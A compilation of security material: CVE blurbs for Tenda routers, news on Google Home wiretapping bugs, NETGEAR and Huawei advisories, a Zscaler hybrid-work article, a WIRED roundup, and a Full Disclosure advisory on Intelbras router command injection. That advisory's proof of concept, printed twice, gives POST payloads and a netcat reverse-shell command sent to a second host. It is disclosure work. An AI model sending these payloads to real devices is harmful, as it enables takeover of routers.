Tenda A15 V15.13.07.13 was discovered to contain a stack overflow via the wepkey4 parameter at /goform/WifiBasicSet.

CVE-2022-47124

Tenda A15 V15.13.07.13 was discovered to contain a stack overflow via the wrlEn parameter at /goform/WifiBasicSet.

CVE-2022-47126

Tenda A15 V15.13.07.13 was discovered to contain a stack overflow via the wepkey2 parameter at /goform/WifiBasicSet.

CVE-2022-47128

Tenda A15 V15.13.07.13 was discovered to contain a stack overflow via the wrlPwd parameter at /goform/WifiBasicSet.

CVE-2022-47127

A security researcher was awarded a bug bounty of $107,500 for identifying security issues in Google Home smart speakers that could be exploited to install backdoors and turn them into wiretapping devices.
The flaws "allowed an attacker within wireless proximity to install a 'backdoor' account on the device, enabling them to send commands to it remotely over the internet, access its microphone

A security researcher was awarded a bug bounty of $107,500 for identifying security issues in Google Home smart speakers that could be exploited to install backdoors and turn them into wiretapping devices.

The flaws "allowed an attacker within wireless proximity to install a 'backdoor' account on the device, enabling them to send commands to it remotely over the internet, access its microphone feed, and make arbitrary HTTP requests within the victim's LAN," the researcher, who goes by the name Matt, disclosed in a technical write-up published this week.

In making such malicious requests, not only could the Wi-Fi password get exposed, but also provide the adversary direct access to other devices connected to the same network. Following responsible disclosure on January 8, 2021, the issues were remediated by Google in April 2021.

The problem, in a nutshell, has to do with how the Google Home software architecture can be leveraged to add a rogue Google user account to a target's home automation device.

In an attack chain detailed by the researcher, a threat actor looking to eavesdrop on a victim can trick the individual into installing a malicious Android app, which, upon detecting a Google Home device on the network, issues stealthy HTTP requests to link an attacker's account to the victim's device.

Taking things a notch higher, it also emerged that, by staging a Wi-Fi deauthentication attack to force a Google Home device to disconnect from the network, the appliance can be made to enter a "setup mode" and create its own open Wi-Fi network.

The threat actor can subsequently connect to the device's setup network and request details like device name, cloud\_device\_id, and certificate, and use them to link their account to the device.

Regardless of the attack sequence employed, a successful link process enables the adversary to take advantage of Google Home routines to turn down the volume to zero and call a specific phone number at any given point in time to spy on the victim through the device's microphone.

"The only thing the victim may notice is that the device's LEDs turn solid blue, but they'd probably just assume it's updating the firmware or something," Matt said. "During a call, the LEDs do not pulse like they normally do when the device is listening, so there is no indication that the microphone is open."

Furthermore, the attack can be extended to make arbitrary HTTP requests within the victim's network and even read files or introduce malicious modifications on the linked device that would get applied after a reboot.

This is not the first time such attack methods have been devised to covertly snoop on potential targets through voice-activated devices.

In November 2019, a group of academics disclosed a technique called Light Commands, which refers to a vulnerability of MEMS microphones that permits attackers to remotely inject inaudible and invisible commands into popular voice assistants like Google Assistant, Amazon Alexa, Facebook Portal, and Apple Siri using light.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Researcher Uncovers Potential Wiretapping Bugs in Google Home Smart Speakers

Certain NETGEAR devices are affected by a buffer overflow by an unauthenticated attacker. This affects RAX40 before 1.0.2.60, RAX35 before 1.0.2.60, R6400v2 before 1.0.4.122, R6700v3 before 1.0.4.122, R6900P before 1.3.3.152, R7000P before 1.3.3.152, R7000 before 1.0.11.136, R7960P before 1.4.4.94, and R8000P before 1.4.4.94.

Was this article helpful?   Yes     No | 5 people found this helpful in last 30 days

Associated CVE IDs: None

First published: 12/28/2022

NETGEAR has released fixes for a pre-authentication buffer overflow security vulnerability on the following product models:

*   RAX40 fixed in firmware version 1.0.2.60
*   RAX35 fixed in firmware version 1.0.2.60
*   R6400v2 fixed in firmware version 1.0.4.122
*   R6700v3 fixed in firmware version 1.0.4.122
*   R6900P fixed in firmware version 1.3.3.152
*   R7000P fixed in firmware version 1.3.3.152
*   R7000 fixed in firmware version 1.0.11.136
*   R7960P fixed in firmware version 1.4.4.94
*   R8000P fixed in firmware version 1.4.4.94

NETGEAR strongly recommends that you download the latest firmware as soon as possible.

**To download the latest firmware for your NETGEAR product:**

1.  Visit NETGEAR Support.
2.  Start typing your model number in the search box, then select your model from the drop-down menu as soon as it appears.  
    If you do not see a drop-down menu, make sure that you entered your model number correctly, or select a product category to browse for your product model.
3.  Click **Downloads**.
4.  Under **Current Versions**, select the download whose title begins with **Firmware Version**.
5.  Click **Download**.
6.  Follow the instructions in your product’s user manual, firmware release notes, or product support page to install the new firmware.

****Disclaimer****

This document is provided on an "as is" basis and does not imply any kind of guarantee or warranty, including the warranties of merchantability or fitness for a particular use. Your use of the information in the document or materials linked from the document is at your own risk. NETGEAR reserves the right to change or update this document at any time. NETGEAR expects to update this document as new information becomes available.

The pre-authentication buffer overflow vulnerability remains if you do not complete all recommended steps. NETGEAR is not responsible for any consequences that could have been avoided by following the recommendations in this notification.

****Acknowledgements****

fr33rh

****Common Vulnerability Scoring System****

CVSS Rating: High

CVSS Score: 7.4

CVSS Vector: CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H

****Best Practices for Updating Firmware****

We recommend that you keep your NETGEAR devices up to date with the latest firmware. Firmware updates contain security fixes, bug fixes, and new features for your NETGEAR products.

If your product is supported by one of our apps, using the app is the easiest way to update your firmware:

*   Orbi products: NETGEAR Orbi app
*   NETGEAR WiFi routers: NETGEAR Nighthawk app
*   Some NETGEAR Business products: NETGEAR Insight app (firmware updates through the app are available only for Insight subscribers)

If your product is not supported by one of our apps, you can always update your firmware manually by following the instructions in your product’s user manual, firmware release notes, or product support page. For more information, see Where can I find information about my NETGEAR product?.

****Contact****

We appreciate and value having security concerns brought to our attention. NETGEAR constantly monitors for both known and unknown threats. Being pro-active rather than re-active to emerging security issues is fundamental for product support at NETGEAR.

It is NETGEAR's mission to be the innovative leader in connecting the world to the internet. To achieve this mission, we strive to earn and maintain the trust of those that use NETGEAR products for their connectivity.

To report a security vulnerability, visit http://www.netgear.com/about/security/. 

If you are a NETGEAR customer with a security-related support concern, you can contact NETGEAR customer support at techsupport.security@netgear.com. 

****Revision History****

12/28/2022: Published advisory

Last Updated:12/29/2022 | Article ID: 000065495

**Was this article helpful?**Yes No

**This article applies to:**

*   Wireless AC Router Nighthawk (6)
    *   R6700v3
    *   R6900P
    *   R7000
    *   R7000P
    *   R7960P
    *   R8000P
*   Wireless AX Router Nighthawk (WiFi 6) (2)
    *   RAX35
    *   RAX40
*   Wireless AC Router (1)
    *   R6400v2

How to Find Your Model Number

**Looking for more about your product?**

Get information, documentation, videos and more for your specific product.

**Need to Contact NETGEAR Support?**

With NETGEAR’s round-the-clock premium support, help is just a phone call away.

**Complimentary Support**

NETGEAR provides complimentary technical support for NETGEAR products for 90 days from the original date of purchase.

Contact Support

**NETGEAR Premium Support**

**GearHead Support for Home Users**

GearHead Support is a technical support service for NETGEAR devices and all other connected devices in your home. Advanced remote support tools are used to fix issues on any of your devices. The service includes support for the following:

*   Desktop and Notebook PCs, Wired and Wireless Routers, Modems, Printers, Scanners, Fax Machines, USB devices and Sound Cards
*   Windows Operating Systems (2000, XP or Vista), MS Word, Excel, PowerPoint, Outlook and Adobe Acrobat
*   Anti-virus and Anti-Spyware: McAfee, Norton, AVG, eTrust and BitDefender

Learn More

**ProSUPPORT Services for Business Users**

NETGEAR ProSUPPORT services are available to supplement your technical support and warranty entitlements. NETGEAR offers a variety of ProSUPPORT services that allow you to access NETGEAR's expertise in a way that best meets your needs:

*   Product Installation
*   Professional Wireless Site Survey
*   Defective Drive Retention (DDR) Service

Learn More

CVE-2022-48196: Security Advisory for Pre-Authentication Buffer Overflow on Some Routers, PSV-2019-0208

There is a denial of service vulnerability in the Wi-Fi module of the HUAWEI WS7100-20 Smart WiFi Router.Successful exploit could cause a denial of service (DoS) condition.

There is a denial of service vulnerability in the Wi-Fi module of the HUAWEI WS7100-20 Smart WiFi Router.Successful exploit could cause a denial of service (DoS) condition. (Vulnerability ID:HWPSIRT-2022-59488)

This vulnerability has been assigned a (CVE) ID: CVE-2022-46740

Affected Product

Affected Version

Resolved Version

WS7100-20

WS7100-20 10.0.5.33

WS7100-20 11.0.5.5

Successful exploit could cause a denial of service (DoS) condition.

HWPSIRT-2022-59488:

Base score:4.3

Temporary score:4.0

Environmental Score:NA

CVSS v3.1 Vector: AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L/E:F/RL:O/RC:C

HWPSIRT-2022-59488:

This vulnerability can be exploited only when the following conditions are present:

An attacker could send a crafted message to the device.

Technical details:

There is a denial of service vulnerability in the Wi-Fi module of the HUAWEI WS7100-20 Smart WiFi Router. Due to incorrect verification of external messages, An attacker can exploit this vulnerability by sending crafted packets to the device.Successful exploitation of this vulnerability may cause a denial of service vulnerability on the WS7100-20.

The product that supports automatic update will receive a system update prompt. You can install the update to fix the vulnerability.

The vulnerability was discovered by external researchers Vyron Kampourakis and Efstratios Chatzoglou.

2022-12-09 V1.1 Updated "Source";  
2022-12-08 V1.0 Initial Release;

Huawei adheres to protecting the ultimate interests of users with best efforts and the principle of responsible disclosure and deal with product security issues through our response mechanism.

To enjoy Huawei PSIRT services and obtain Huawei product vulnerability information, please visit http://www.huawei.com/en/psirt.

To report a security vulnerability in Huawei products and solutions, please send it to PSIRT@huawei.com. For details, please visit http://www.huawei.com/en/psirt/report-vulnerabilities.

This document is provided on an "AS IS" basis and does not imply any kind of guarantee or warranty, either express or implied, including the warranties of merchantability or fitness for a particular purpose. In no event shall Huawei or any of its directly or indirectly controlled subsidiaries or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. Your use of the document, by whatsoever means, will be totally at your own risk. Huawei is entitled to amend or update this document from time to time.

CVE-2022-46740: huawei-sa-DoSViHSWR-8f632df1-en

Digital transformation initiatives are challenging because IT still has to make sure performance doesn't suffer by making applications available from anywhere.

Over the past two years, many businesses have adopted hybrid work environments and begun migrating mission-critical applications to the cloud to allow their hybrid workforce to work from anywhere. However, combining working from anywhere with migrating applications such as Salesforce, SAP, Microsoft 365, and ServiceNow was an IT challenge because the networks needed to be improved.

The challenge was to reduce downtime and increase end user productivity. Even minor outages can impact operations, productivity, and profits, with Gartner suggesting that unplanned downtime costs US$5,600 per minute. To reduce such costs, businesses must quickly identify the root cause of outages and turn to intelligent digital experience monitoring solutions.

    

45 minutes of downtime costs more than a quarter million dollars. (Source: Gartner)

Businesses spent time rethinking the digital transformation journey to ensure they were delivering excellent performance while still securing users, workloads, and device communications over any network. As businesses look forward to 2023, three top digital experience monitoring trends emerge:

**Increase Hybrid Workforce Productivity**

Many businesses have accelerated digital business initiatives over the past couple of years to retain talent and optimize productivity. Companies like Zoom, Facebook, Google, and Apple adjusted their work-from-home policies to allow 100% remote and hybrid formats. Even healthcare businesses have enabled staff to work remotely, offering more telemedicine options and limiting in-person appointments.

Remote work is here to stay for the foreseeable future, as employees have proven that this hybrid model is possible. However, IT teams need to focus on keeping the business operational while ensuring excellent end user productivity. Supporting hybrid workers means having fast and reliable insights as issues arise from various devices, applications, and networks being used. For example, help desk and network operations teams need to know whether the user is having an issue with the local Wi-Fi connection or if there are problems with any of the network hops between the user's machine and where the application is hosted.

As hybrid workers become more adept at working from home, they learn basic connectivity troubleshooting steps, such as rebooting the home Wi-Fi router. In 2023, businesses need to be able to quickly recommend ways to solve end user problems without requiring users to open support tickets. IT teams need a global view of their environment to pinpoint areas of focus, and then to actively look at specific users to understand their challenges. This will reduce IT troubleshooting time while increasing end user productivity.

**Faster Mean Time to Resolution (MTTR) With Smart Technologies**

Service desk and network operations teams must look past traditional castle-and-moat architecture, change their work-from-home policies, and provide users with fast and reliable access from anywhere. To increase productivity, IT teams must diagnose an end user's situation quickly and confidently. They must analyze each device, dedicated network path, and application response times. That's the only way to grasp the end user's dilemma fully. To effectively analyze data from these segments and provide a meaningful response, IT teams will benefit from the help of AI and machine learning (ML).

In 2023, we’ll see continued growth in AI/ML-based technologies as they ingest more data and learn to apply insights across the board. The key will be the amount of data being ingested and analyzed. The intelligence will come from solutions that combine multiple facets of end user experience. For example, providing secure, fast, and reliable connections with the ability to triage issues based on collected data will separate solutions that offer combined capabilities from ordinary point products.

The FIFA World Cup used AI to produce some compelling projections . Imagine if the players knew exactly where to position the ball for a goal—it would be game-changing! Similarly, if service desk and network operations teams could similarly leverage AI, they would be able to quickly triage end user issues In 2023, let's spend less time with traditional operations troubleshooting guides and more with AI-based solutions.

As IT teams look to better understand their environments, they’ll need intelligent systems to provide trends and patterns holistically. In 2023, AI-based solutions should evolve to find trends and systematic issues. For example, imagine a view into your network that classified which ISPs were the most troublesome globally. You could create a plan to move off those ISPs or position them as backups, for instance. You could also use this knowledge to negotiate better terms with the ISP. Armed with AI-based insights, IT teams would have opportunities to optimize their environments and reduce potential outage scenarios.

**Reduce IT Costs With Monitoring Plus Security Solutions**

Macroeconomics will focus on reducing overall costs and increasing flexibility (consolidation). In 2023, businesses will not only look to remove siloed monitoring solutions around devices, networks, and applications; they will also look for solutions that combine monitoring and security. These two services fit together nicely.

With security issues on the rise, IT teams will continue to face pressure from executives on what happened, end user impact, and prevention techniques. The challenge will be trying to reduce costs while gaining this intelligence. Cloud-based solutions make it easier for IT teams to get started small, get comfortable with the solution, and then scale.

For example, when the economy shifts, more businesses look to consolidate through mergers and acquisitions. However, these business initiatives aren’t always predictable, and IT must ensure solutions are in place that can easily handle these shifts. With secure cloud-based solutions, IT teams can quickly focus on security and monitoring, and then scale while controlling costs .

One more way to reduce costs in 2023 will be to focus on using existing IT service management tools. For example, many businesses use ServiceNow—wouldn't it be great if digital experience monitoring could easily integrate into these solutions? IT teams could more easily adopt new digital experience monitoring solutions without changing their entire workflow. Continuing to reduce costs is all about intelligently gaining insights with smarter integrations.

Read more _Partner Perspectives_ from Zscaler.

Securing and Improving User Experience for the Future of Hybrid Work

Intelbras WiFiber 120AC inMesh before 1-1-220826 allows command injection by authenticated users, as demonstrated by the /boaform/formPing6 and /boaform/formTracert URIs for ping and traceroute.

**Full Disclosure mailing list archives****Re: CyberDanube Security Research 20221009-0 | Authenticated Command Injection in Intelbras WiFiber 120AC inMesh**

_From_: Thomas Weber <t.weber () cyberdanube com>  
_Date_: Tue, 13 Dec 2022 17:59:41 +0100  

CyberDanube Security Research 20221009-0

\-------------------------------------------------------------------------------

               title| Authenticated Command Injection
             product| Intelbras WiFiber 120AC inMesh
  vulnerable version| 1.1-220216
       fixed version| 1-1-220826
          CVE number| CVE-2022-40005
              impact| High
            homepage| https://www.intelbras.com
               found| 2022-08-01
                  by| T. Weber (Office Vienna)
                    | CyberDanube Security Research
                    | Vienna | St. Pölten
                    |
                    | https://www.cyberdanube.com

\-------------------------------------------------------------------------------

Vendor description

\-------------------------------------------------------------------------------

"We are Intelbras. A company that for 45 years has been offering innovative

solutions in security, networks, communication and energy. Our dream began to come to life there in 1976, in the city of São José, having originated from an

INspiration and a promising idea: to manufacture PABX centrals. During the

80's, we surprised the market with the launch of the first PABX developed with national technology, a product that showed everyone our innovative DNA. The 90s

were marked by the consolidation of the company in the telecommunications

segment and we became leaders in the PABX and telephone terminals segment. The

turn of the millennium represented the search for greater connection and

proximity to people, something that is in total harmony with our philosophy to this day. More consolidated in the market, in 2010 we opened 3 manufacturing

units, located in Santa Rita do Sapucaí/MG, Manaus/AM and São José/SC.

We reached our 45th birthday having reached a historic milestone: we have been a company listed on the B3 since February 2021. Our trajectory so far has been INnovative, INtelligent and INSpiring. We saw innovation, which is part of our

DNA, increasingly present in our daily lives. And it was only possible to

write a story so full of achievements because employees, partners and customers

were close and believed in us."

Source: https://www.intelbras.com/en/institutional/who-we-are

Vulnerable versions

\-------------------------------------------------------------------------------

WiFiber 120AC inMesh / 1.1-220216


Vulnerability overview

\-------------------------------------------------------------------------------

1) Authenticated Command Injection (CVE-2022-40005)

The web server of the device is prone to an authenticated command injection. It allows an attacker to gain full access to the underlying operating system of the device with all implications. If such a device is acting as key device in an industrial network, more extensive damage in the corresponding network can

be done by an attacker.


Proof of Concept

\-------------------------------------------------------------------------------

1) Authenticated Command Injection (CVE-2022-40005)
The web server is prone to an authenticated command injection via POST
parameters. The following proof-of-concept shows how to inject the command
"ls /" to the system which gets executed in the background:

\===============================================================================

POST /boaform/formPing6 HTTP/1.1
Host: 192.168.3.147

User-Agent: Mozilla/5.0 (X11; Linux x86\_64; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,\*/\*;q=0.8

Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 87
Origin: http://192.168.3.147
Connection: close
Referer: http://192.168.3.147/ping6.asp
Upgrade-Insecure-Requests: 1

pingAddr=%3Bls+%2F%3B&wanif=65535&go=+Ir&submit-url=%2Fping6.asp&postSecurityFlag=39908 \===============================================================================

The following commands can be used to open a reverse shell:

"rm -f /tmp/f"
"mkfifo /tmp/f"
"cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.3.138 8889 >/tmp/f"

Those commands were sent via a crafted POST request:

\===============================================================================

POST /boaform/formTracert HTTP/1.1
Host: 192.168.3.147

User-Agent: Mozilla/5.0 (X11; Linux x86\_64; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,\*/\*;q=0.8

Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 255
Origin: http://192.168.3.147
Connection: close
Referer: http://192.168.3.147/tracert.asp
Upgrade-Insecure-Requests: 1

proto=0&traceAddr=%3Brm+-f+%2Ftmp%2Ff%3Bmkfifo+%2Ftmp%2Ff%3Bcat+%2Ftmp%2Ff%7C%2Fbin%2Fsh+-i+2%3E%261%7Cnc+192.168.3.138+8889+%3E%2Ftmp%2Ff%3B&trys=3&timeout=5&datasize=56&dscp=0&maxhop=30&wanif=65535&go=+Ir&submit-url=%2Ftracert.asp&postSecurityFlag=29290 \===============================================================================

The vulnerability was manually verified on an emulated device by using the
MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).


Solution

\-------------------------------------------------------------------------------

Update to firmware version 1-1-220826.

https://backend.intelbras.com/sites/default/files/2022-08/ONT\_Wifiber\_120\_AC\_Vers%C3%A3o\_1-1-220826.zip

Workaround

\-------------------------------------------------------------------------------

None


Recommendation

\-------------------------------------------------------------------------------

CyberDanube recommends Intelbras customers to upgrade the firmware to the
latest version available.


Contact Timeline

\-------------------------------------------------------------------------------

2022-08-02: Contacting Intelbras via suporte () intelbras com br.
2022-08-03: Request from Intelbras to send the advisory to
csirt () intelbras com br; Sent the advisory to this address.
2022-08-30: Asked for status update; Vendor answered that the new firmware

            version has been released the day before. Set the disclosure date

            to 2022-10-03 (60 days policy).
2022-10-03: Shifted disclosure date to 2022-10-09 due to sick colleagues.
2022-10-09: Coordinated disclosure of advisory.


Web: https://www.cyberdanube.com
Twitter: https://twitter.com/cyberdanube
Mail: research at cyberdanube dot com

EOF T. Weber / @2022

On 09.10.22 17:21, Thomas Weber wrote:

> CyberDanube Security Research 20221009-0
> 
> \-------------------------------------------------------------------------------
> 
>                title| Authenticated Command Injection
>              product| Intelbras WiFiber 120AC inMesh
>   vulnerable version| 1.1-220216
>        fixed version| 1-1-220826
>           CVE number|
>               impact| High
>             homepage| https://www.intelbras.com
>                found| 2022-08-01
>                   by| T. Weber (Office Vienna)
>                     | CyberDanube Security Research
>                     | Vienna | St. Pölten
>                     |
>                     | https://www.cyberdanube.com
> 
> \-------------------------------------------------------------------------------
> 
> Vendor description
> 
> \------------------------------------------------------------------------------- "We are Intelbras. A company that for 45 years has been offering innovative solutions in security, networks, communication and energy. Our dream began to come to life there in 1976, in the city of São José, having originated from an INspiration and a promising idea: to manufacture PABX centrals. During the 80's, we surprised the market with the launch of the first PABX developed with national technology, a product that showed everyone our innovative DNA. The 90s
> 
> were marked by the consolidation of the company in the telecommunications
> 
> segment and we became leaders in the PABX and telephone terminals segment. The
> 
> turn of the millennium represented the search for greater connection and
> 
> proximity to people, something that is in total harmony with our philosophy to this day. More consolidated in the market, in 2010 we opened 3 manufacturing
> 
> units, located in Santa Rita do Sapucaí/MG, Manaus/AM and São José/SC.
> 
> We reached our 45th birthday having reached a historic milestone: we have been a company listed on the B3 since February 2021. Our trajectory so far has been INnovative, INtelligent and INSpiring. We saw innovation, which is part of our
> 
> DNA, increasingly present in our daily lives. And it was only possible to
> 
> write a story so full of achievements because employees, partners and customers
> 
> were close and believed in us."
> 
> Source: https://www.intelbras.com/en/institutional/who-we-are
> 
> Vulnerable versions
> 
> \-------------------------------------------------------------------------------
> 
> WiFiber 120AC inMesh / 1.1-220216
> 
> 
> Vulnerability overview
> 
> \-------------------------------------------------------------------------------
> 
> 1) Authenticated Command Injection
> 
> The web server of the device is prone to an authenticated command injection. It allows an attacker to gain full access to the underlying operating system of the device with all implications. If such a device is acting as key device in an industrial network, more extensive damage in the corresponding network can
> 
> be done by an attacker.
> 
> 
> Proof of Concept
> 
> \-------------------------------------------------------------------------------
> 
> 1) Authenticated Command Injection
> The web server is prone to an authenticated command injection via POST
> 
> parameters. The following proof-of-concept shows how to inject the command
> 
> "ls /" to the system which gets executed in the background:
> 
> \===============================================================================
> 
> POST /boaform/formPing6 HTTP/1.1
> Host: 192.168.3.147
> 
> User-Agent: Mozilla/5.0 (X11; Linux x86\_64; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,\*/\*;q=0.8
> 
> Accept-Language: de,en-US;q=0.7,en;q=0.3
> Accept-Encoding: gzip, deflate
> Content-Type: application/x-www-form-urlencoded
> Content-Length: 87
> Origin: http://192.168.3.147
> Connection: close
> Referer: http://192.168.3.147/ping6.asp
> Upgrade-Insecure-Requests: 1
> 
> pingAddr=%3Bls+%2F%3B&wanif=65535&go=+Ir&submit-url=%2Fping6.asp&postSecurityFlag=39908 \===============================================================================
> 
> The following commands can be used to open a reverse shell:
> 
> "rm -f /tmp/f"
> "mkfifo /tmp/f"
> "cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.3.138 8889 >/tmp/f"
> 
> Those commands were sent via a crafted POST request:
> 
> \===============================================================================
> 
> POST /boaform/formTracert HTTP/1.1
> Host: 192.168.3.147
> 
> User-Agent: Mozilla/5.0 (X11; Linux x86\_64; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,\*/\*;q=0.8
> 
> Accept-Language: de,en-US;q=0.7,en;q=0.3
> Accept-Encoding: gzip, deflate
> Content-Type: application/x-www-form-urlencoded
> Content-Length: 255
> Origin: http://192.168.3.147
> Connection: close
> Referer: http://192.168.3.147/tracert.asp
> Upgrade-Insecure-Requests: 1
> 
> proto=0&traceAddr=%3Brm+-f+%2Ftmp%2Ff%3Bmkfifo+%2Ftmp%2Ff%3Bcat+%2Ftmp%2Ff%7C%2Fbin%2Fsh+-i+2%3E%261%7Cnc+192.168.3.138+8889+%3E%2Ftmp%2Ff%3B&trys=3&timeout=5&datasize=56&dscp=0&maxhop=30&wanif=65535&go=+Ir&submit-url=%2Ftracert.asp&postSecurityFlag=29290 \===============================================================================
> 
> The vulnerability was manually verified on an emulated device by using the
> 
> MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).
> 
> 
> Solution
> 
> \-------------------------------------------------------------------------------
> 
> Update to firmware version 1-1-220826.
> 
> https://backend.intelbras.com/sites/default/files/2022-08/ONT\_Wifiber\_120\_AC\_Vers%C3%A3o\_1-1-220826.zip
> 
> Workaround
> 
> \-------------------------------------------------------------------------------
> 
> None
> 
> 
> Recommendation
> 
> \-------------------------------------------------------------------------------
> 
> CyberDanube recommends Intelbras customers to upgrade the firmware to the
> latest version available.
> 
> 
> Contact Timeline
> 
> \-------------------------------------------------------------------------------
> 
> 2022-08-02: Contacting Intelbras via suporte () intelbras com br.
> 2022-08-03: Request from Intelbras to send the advisory to
> csirt () intelbras com br; Sent the advisory to this address.
> 
> 2022-08-30: Asked for status update; Vendor answered that the new firmware             version has been released the day before. Set the disclosure date
> 
>             to 2022-10-03 (60 days policy).
> 2022-10-03: Shifted disclosure date to 2022-10-09 due to sick colleagues.
> 2022-10-09: Coordinated disclosure of advisory.
> 
> 
> Web: https://www.cyberdanube.com
> Twitter: https://twitter.com/cyberdanube
> Mail: research at cyberdanube dot com
> 
> EOF T. Weber / @2022

**Attachment: smime.p7s**  
_Description:_ S/MIME Cryptographic Signature

\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

**Current thread:**

*   **Re: CyberDanube Security Research 20221009-0 | Authenticated Command Injection in Intelbras WiFiber 120AC inMesh** _Thomas Weber (Dec 13)_

CVE-2022-40005: Full Disclosure: Re: CyberDanube Security Research 20221009-0

Plus: An offensive US hacking operation, swatters hacking Ring cameras, a Netflix password-sharing crackdown, and more.

We at WIRED are winding down for the year and gearing up for what is sure to be an eventful 2023. But 2022 isn’t going down without a fight. 

This week, following a new surge in mayhem at Twitter, we dove into exactly why the public needs real-time flight tracking, even if Elon Musk claims it’s the equivalent of doxing. The crucial transparency this publicly available data provides far outweighs the limited privacy value that censoring would give to the world’s rich and powerful. Unfortunately, Musk’s threats of legal action against the developer of the @ElonJet tracker are having broader chilling effects. 

Meanwhile, Iran’s internet blackouts—a response to widespread civil rights protests—are sabotaging the country’s economy, according to a new assessment from the US Department of State. Due to heavy sanctions on Iranian entities, the exact economic impact of Tehran’s internet blackouts is difficult to calculate. But experts agree it’s not good. 

You may have encountered the Flipper Zero in a recent viral TikTok video—but don’t believe everything you see. WIRED’s Dhruv Mehrotra got his hands on the palm-size device, which packs an array of antennas that allow you to copy and broadcast signals from all types of devices, like RFID chips, NFC cards, and more. We found that while the Flipper Zero can’t, say, make an ATM spill out money, it allows you to do plenty of other things that could get you into trouble. But mostly, it allows you to see the radio-wave-filled world around you like never before.

But that’s not all. Each week, we round up the security stories we didn’t cover in-depth ourselves. Click on the headlines to read the full stories. And stay safe out there. 

Between long hours, medallion costs, and the rise of Uber and Lyft, the life of a New York City cab driver is hard enough. Now it seems that Russian hackers—and a couple of their enterprising partners in Queens—were trying to get their own cut of those drivers’ fares.

According to prosecutors, two Queens men, Daniel Abayev and Peter Leyman, worked with Russian hackers to gain access to the taxi dispatch system for New York’s JFK airport. They then allegedly created a group chat where drivers could secretly pay $10 to skip the sometimes hours-long line to be assigned a pickup—about a fifth of the $52 flat fee passengers pay for rides from the airport to elsewhere in NYC. The indictment against the two men doesn’t name the Russians or detail exactly how they gained access to JFK’s dispatch system. But it notes that since 2019, Abayev and Leyman allegedly schemed to get access to the system by multiple methods, including bribing someone to insert a USB drive with malware into one of the dispatch operators’ computers, gaining unauthorized access to their systems via Wi-Fi, and stealing one of their tablet computers. “I know that the Pentagon is being hacked,” Abayev wrote to his Russian contacts in November 2019, according to the indictment. “So, can’t we hack the taxi industry\[?\]” 

Before the scheme was shut down, prosecutors say it was enabling as many as a thousand fraudulent line-skips a day for drivers, 

It’s hardly a secret that Cyber Command, the more cyberattack-focused sister organization to the NSA, is frequently engaged in “hunting forward,” as Cybercom director Paul Nakasone has described it. That means hacking foreign hackers preemptively to disrupt their operations, often in advance of an event like a US election. So perhaps it’s no surprise, as _The Washington Post_ reports, that Cybercom targeted Russian and Iranian hackers throughout the 2022 midterm elections. It’s not clear exactly how those hackers were disrupted, but one official told the _Post_ that the operations typically go after the basic tools the hackers use to operate, including their computers, internet connections, and malware. In some cases, that foreign malware is discovered by Cybercom abroad and shared with potential targets in the US to make it more easily detected. 

While foreign hacking of US elections has waned since its peak in 2016—when Russia hacked the Democratic National Committee, Clinton campaign, and many other targets—it has by no means disappeared. Cybersecurity firm Mandiant reported this week that the Russian military intelligence agency the GRU appears to have targeted election websites with distributed denial-of-service attacks during the midterm elections, despite Cyber Command’s efforts.

On Monday, federal prosecutors charged two men—one from Wisconsin, the other from North Carolina—for allegedly participating in a swatting scheme that, over a one-week span, targeted the owners of more than a dozen compromised Ring home security door cameras.  According to the indictment, Kya Christian Nelson, 21, and James Thomas Andrew McCarty, 20, used login credentials from leaked Yahoo accounts to access Ring accounts from individuals around the country. The defendants then allegedly phoned in false reports to law enforcement claiming to dispatchers that a violent incident was taking place at the victim’s house, and then they livestreamed the police response to the hoax. In several of the incidents, the two men taunted responding police officers and victims through the microphone of the Ring device, according to the indictment.

Nelson, who went by the alias “ChumLul,” is currently incarcerated in Kentucky in an unrelated case. McCarty, who went by the alias “Aspertaine,” was arrested last week on federal charges filed in the District of Arizona. Nelson and McCarty are both charged with conspiring to intentionally access computers without authorization. Nelson has also been charged with two counts of intentionally accessing a computer without authorization and two counts of aggravated identity theft. If convicted, they could each face up to five years in prison, with Nelson facing an additional seven years for the additional charges.

In March 2017, Netflix tweeted a simple message: “Love is sharing a password.” Now, five years later, that sentiment is coming to the end of its life. According to a _Wall Street Journal_ report this week, the streaming service plans to clamp down on password sharing in early 2023. Netflix has been testing ways to stop households in Latin America from sharing passwords throughout 2022, and the report suggests it is ready to expand the measures. Netflix says more than 100 million viewers watch its TV shows and movies using other people’s passwords, and it wants to convert those views into cash. “Make no mistake, I don’t think consumers are going to love it right out of the gate,” the _Journal_ reports Netflix co-CEO Ted Sarandos telling investors earlier this year. Elsewhere, the UK government’s Intellectual Property Office said it believes sharing passwords for online streaming services could breach copyright laws. It is unlikely anyone would ever be prosecuted, though.

